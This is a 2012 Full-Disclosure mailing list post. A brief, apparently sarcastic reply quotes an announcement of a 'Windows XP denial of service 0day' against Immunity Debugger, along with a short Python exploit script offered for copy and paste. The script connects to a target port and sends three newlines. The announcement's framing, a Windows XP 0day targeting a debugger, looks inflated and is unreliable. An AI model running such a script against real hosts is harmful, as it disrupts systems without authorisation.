-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > Windows XP denial of service 0day found in CTF exercise
Oof, this is almost as bad as that BackTrack 0 day released the other day (http://www.backtrack-linux.org/backtrack/backtrack-0day-privilege-escalation/). Any response from Microsoft yet? Justin C. Klein Keane http://www.MadIrish.net The PGP signature on this email can be verified using the public key at http://www.madirish.net/gpgkey On 04/17/2012 02:48 AM, Adam Behnke wrote: > Immunity Debugger Remote Denial of Service 0Day Tested against > version 1.76 and 1.80 on Windows XP distributions > > Has not been tested for potential privilege escalation vectors. > > We first wrote about Immunity Debugger here: > http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/ > > Discovered by a student that wishes to remain anonymous in the > course CTF. This 0day exploit for Windows was discovered by a > student in the InfoSec Institute Ethical Hacking class, during an > evening CTF exercise. The student wishes to remain anonymous, he > has contributed a python version of the 0day. A patch that can be > applied to Windows has not been made available. You can find a > python version of the exploit to copy and paste here: > > > #!/usr/bin/python #Windows XP denial of service 0day exploit > discovered on 4.9.12 by InfoSec Institute student #For full write > up and description go to > http://www.infosecinstitute.com/courses/ethical_hacking_training.html > > import sys > import os import time import getopt import socket > > class Error(Exception): def __init__(self, error): > self.errorStr=error def __str__(self): return repr(self.errorStr) > > class Exploit(): > > def __init__(self, targetHost, targetPort): self.targetHost = > targetHost > > def exploit(self, targetHost, targetPort): > > try: socket.inet_aton(targetHost) s = > socket.socket(socket.AF_INET,socket.SOCK_STREAM) > s.connect((targetHost,targetPort)) except socket.error: raise > Error("Unable to exploit (Connect failed.)") sys.exit(0) > > # exploit try: s.sendto("\n\n\n", (targetHost, targetPort)) > except: raise Error("Unable to exploit (Exploit failed.)") > > def usage(): print "[!] Usage:" print " ( -h, --help ):" print " > Print this message." print " ( --targetHost= ): Target host." print > " --targetHost=127.0.0.1" print " ( --targetPort= ): Target > port." print " --targetPort=8888" > > def main(): print "[$] Windows XP 0Day" try: opts, args = > getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=", > "targetPort="]) except getopt.GetoptError, err: # Print help > information and exit: print '[!] Parameter error:' + str(err) # > Will print something like "option -a not recognized" usage() > sys.exit(0) > > targetHost=None targetPort=None for opt, arg in opts: if opt in > ("-h", "--help"): usage() sys.exit(0) elif opt =="--targetHost": > targetHost=arg elif opt =="--targetPort": targetPort=arg else: # I > would be assuming to say we'll never get here. print "[!] Parameter > error." usage() sys.exit(0) if not targetHost: print "[!] > Parameter error: targetHost not set." usage() sys.exit(0) > > if not targetPort: print "[!] Parameter error: targetPort not > set." usage() sys.exit(0) > > exploit = Exploit(targetHost, targetPort) > > print "[*] Attempting to exploit:" try: > exploit.exploit(targetHost, int(targetPort)) except Error as > error: print "[!] Exploit Error: %s" % (error.errorStr) exit(0) > print "[*] Exploit appears to have worked." > > # Standard boilerplate to call the main() function to begin # the > program. if __name__=='__main__': main() > > > > _______________________________________________ Full-Disclosure - > We believe in it. Charter: > http://lists.grok.org.uk/full-disclosure-charter.html Hosted and > sponsored by Secunia - http://secunia.com/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iPwEAQECAAYFAk+NYXEACgkQkSlsbLsN1gBiggb/efTTww5szr9rcI+NbsUzybuk rhPyvj99VJMMVCUjHrDrWKXQeTD/rrorY3SYMIGNlHzVWgqkiswM5N16Fy9MvqIH 2Cc8aJ5kh2xi9vtlCHlPZ7XJeN3tPEL+8/qOVbT7I2CNeD8JJseVfcJwnoEyyumm SZYmoxjJriMT7IAXysHJudaF294DvC+z6drvF+ou8wnVcIB0nkXoCVNsbcDK9dwS R4f0a+QYN1tXM7+8za6/VznbDwcqw/amqeS3V883lqlt0XCHx5zIh+VxG0qvB5Ui EPjoh3P/OEMP7PYRozM= =y+j6 -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
